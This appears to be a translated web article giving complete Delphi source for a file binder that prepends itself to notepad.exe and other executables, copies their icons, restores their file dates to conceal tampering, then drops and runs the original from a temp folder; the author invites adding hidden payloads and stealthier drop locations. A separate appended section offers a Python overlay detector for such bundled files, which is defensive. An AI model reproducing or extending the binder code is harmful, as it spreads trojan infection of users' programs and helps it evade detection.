Alternative intrusion methods: new thinking on bundled executable files

Add Date: 2016-12-13
New features: bundles itself with other programs and takes over the other program's icon.
The demonstration program has no form; compiled and compressed, it is only 40K, and it does not stay resident in memory after running.
If you add a hidden form, a routine that searches for executable programs, a system-monitoring function, a $%#@*^ function ...

The program depends on a few figures:
1. When this program is compiled and compressed with Aspack.Exe, its size is 41472 bytes.
2. Analysis of the Aspack.Exe-compressed file shows that the first 40751 bytes precede the icon; the icon data
   occupies 640 bytes starting at byte 40752, and 81 bytes follow the icon.

Layout when bundled with another program:
the first 40751 bytes of this program + the icon + the last 81 bytes of this program + the whole bundled program

How to find the location of the icon:
The program's icon is a 32 * 32 red block. After the program is compiled and compressed, load it into a hex editor
and search for the string "999 999". Later you can replace it with an icon suited to the program it is bundled with.
Hex editor software: UltraEdit is common.
I suspect it has a date limit; I wrote my own hex editor with compare and search functions, and it is continuously improved; handling files of a few hundred K is no problem:
http://guanbh.top263.net/download/hexedit.exe
}
program exe2;

uses
  Classes,
  Tlhelp32,
  Windows,
  Graphics,
  ShellAPI,
  SysUtils;

{$R *.RES}

var
  lppe: TProcessEntry32;
  found: boolean;
  handle: THandle;
  ProcessStr, ExeName: string;
  WinDir: pchar;

const
  MySize = 41472; {!! Adjust this value to the compiled (or compressed) file size !!}

procedure copy2(s: string);
var
  s1, s2, IcoStream: TMemoryStream;
  File2: TFileStream;
  ch: array[0..1] of char;
  ss: string;
  filetime, fhandle: integer;
  l: integer;
  File2Icon: TIcon;
begin
  {If file s does not exist, do nothing}
  if FileExists(s) = False then exit;
  try
    {If the file contains no icon, do not bundle it}
    File2Icon := TIcon.Create;
    l := ExtractIcon(handle, pchar(s), 0);
    if l = 0 then
    begin
      File2Icon.Free;
      exit;
    end
    else
    begin
      {Extract the icon of the program to be bundled}
      File2Icon.Handle := ExtractIcon(handle, pchar(s), 0);
      IcoStream := TMemoryStream.Create;
      File2Icon.SaveToStream(IcoStream);
      File2Icon.Free;
    end;
    {Check whether file s carries a second program header 'MZ' at offset MySize; if so it has already been merged}
    File2 := TFileStream.Create(s, fmOpenRead);
    if File2.Size > MySize then
    begin
      File2.Position := MySize;
      File2.Read(ch, 2);
      ss := copy(ch, 1, 2);
      if ss = 'MZ' then
      begin
        File2.Free;
        exit;
      end;
    end;
    File2.Free;
    {Merge: the new file s = this program + the original file s}
    s2 := TMemoryStream.Create;
    s2.LoadFromFile(ExeName);
    s1 := TMemoryStream.Create;
    {
      The first 40751 bytes of this program precede the icon;
      from byte 40752 there are 640 bytes of icon data.
      !! Change the figures 40751 and 81 below to match the actual file !!
    }
    s1.CopyFrom(s2, 40751);
    {Replace the icon with the bundled program's icon; the icon file is 766 bytes}
    IcoStream.Position := 126;
    s1.CopyFrom(IcoStream, 640);
    IcoStream.Free;
    s2.Position := 40751 + 640;
    {Append the last 81 bytes of this program}
    s1.CopyFrom(s2, 81);
    s2.Clear;
    s2.LoadFromFile(s);
    s1.Seek(s1.Size, soFromBeginning);
    {Append the entire bundled program}
    s1.CopyFrom(s2, s2.Size);
    s2.Free;
    {Get the date of file s}
    fhandle := FileOpen(s, fmOpenRead);
    filetime := FileGetDate(fhandle);
    FileClose(fhandle);
    s1.SaveToFile(s);
    {Restore the date of file s}
    fhandle := FileOpen(s, fmOpenWrite);
    FileSetDate(fhandle, filetime);
    FileClose(fhandle);
    s1.Free;
  except end;
end;

procedure CreateFileAndRun;
var
  s1, s2: TMemoryStream;
  TempDir: pchar;
  cmdstr: string;
  a: integer;
begin
  s1 := TMemoryStream.Create;
  s1.LoadFromFile(ExeName);
  if s1.Size = MySize then
  begin
    s1.Free;
    exit;
  end;
  s1.Seek(MySize, soFromBeginning);
  s2 := TMemoryStream.Create;
  s2.CopyFrom(s1, s1.Size - MySize);
  GetMem(TempDir, 255);
  GetTempPath(255, TempDir);
  try
    {
      Write the file to a temporary directory.
      If you do not want the released files to be visible in that directory, change it to a more hidden one,
      such as c:\windows (or winnt)\d... (which directory, study that yourself)
    }
    s2.SaveToFile(TempDir + '\' + ExtractFileName(ExeName));
  except end;
  cmdstr := '';
  a := 1;
  while ParamStr(a) <> '' do
  begin
    cmdstr := cmdstr + ParamStr(a) + ' ';
    inc(a);
  end;
  {Run the real program}
  WinExec(pchar(TempDir + '\' + ExtractFileName(ExeName) + ' ' + cmdstr), SW_SHOW);
  FreeMem(TempDir);
  s2.Free;
  s1.Free;
end;

begin
  GetMem(WinDir, 255);
  GetWindowsDirectory(WinDir, 255);
  ExeName := ParamStr(0);
  handle := CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0);
  found := Process32First(handle, lppe);
  ProcessStr := '';
  while found do
  begin
    ProcessStr := ProcessStr + lppe.szExeFile; {list all processes}
    found := Process32Next(handle, lppe);
  end;
  {If notepad is not running, bundle with it}
  if pos(WinDir + '\notepad.exe', ProcessStr) = 0 then
  begin
    copy2(WinDir + '\notepad.exe');
  end;
  {Other files to bundle:
  if pos(..., ProcessStr) = 0 then
  begin
    copy2(...);
  end;
  ...
  }
  FreeMem(WinDir);
  {
    Whatever else you want this program to do ...
  }
  CreateFileAndRun; {release the real file and run it}
end.
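A defender-side check for the layout described above, added here and not part of the original program: instead of testing for 'MZ' at one hard-coded offset (the binder's MySize), it reads the PE section table to find where the host image really ends and flags any trailing overlay, in particular one that begins with another 'MZ' header. The PE it scans is a minimal sample constructed inline (not a real executable); the function names are this example's own.

```python
import struct

def pe_image_end(data: bytes) -> int:
    """Offset where the PE's raw section data ends: max(PointerToRawData +
    SizeOfRawData) over the section table. Anything past it is 'overlay'."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off, = struct.unpack_from("<I", data, 0x3C)            # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec, = struct.unpack_from("<H", data, pe_off + 6)        # NumberOfSections
    opt_size, = struct.unpack_from("<H", data, pe_off + 20)   # SizeOfOptionalHeader
    sec_table = pe_off + 24 + opt_size
    end = sec_table + nsec * 40                               # headers at minimum
    for i in range(nsec):
        raw_size, raw_ptr = struct.unpack_from("<II", data, sec_table + i * 40 + 16)
        end = max(end, raw_ptr + raw_size)
    return end

def find_overlay(data: bytes) -> tuple:
    """Return (image_end, overlay_length, overlay_starts_with_MZ). A non-empty
    overlay beginning with 'MZ' is what an appended executable leaves behind;
    the binder above tests for the same two bytes, but only at its fixed MySize."""
    end = pe_image_end(data)
    overlay = data[end:]
    return end, len(overlay), overlay[:2] == b"MZ"

def build_sample_pe(raw_ptr: int = 0x200, raw_size: int = 0x200) -> bytes:
    """Constructed minimal PE32 (headers + one zero-filled section) used only as
    offline test input; it is not a real program and cannot execute."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                   # e_lfanew -> 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = bytes(224)                                           # zeroed PE32 optional header
    sec = (b".text\0\0\0" + struct.pack("<IIII", raw_size, 0x1000, raw_size, raw_ptr)
           + bytes(16))
    return (bytes(dos) + coff + opt + sec).ljust(raw_ptr, b"\0") + bytes(raw_size)

CLEAN = build_sample_pe()
BUNDLED = CLEAN + build_sample_pe()   # second image glued on, as the binder does

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("bundled", BUNDLED)):
        end, extra, has_mz = find_overlay(blob)
        print(f"{name}: image ends at {end}, overlay {extra} bytes, MZ in overlay: {has_mz}")
```

Because the binder restores the host's file date after writing, a modification-time comparison will not notice the change; the overlay check above relies only on file contents.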
  CopyRight 2002-2020 newfreesoft.com, All Rights Reserved.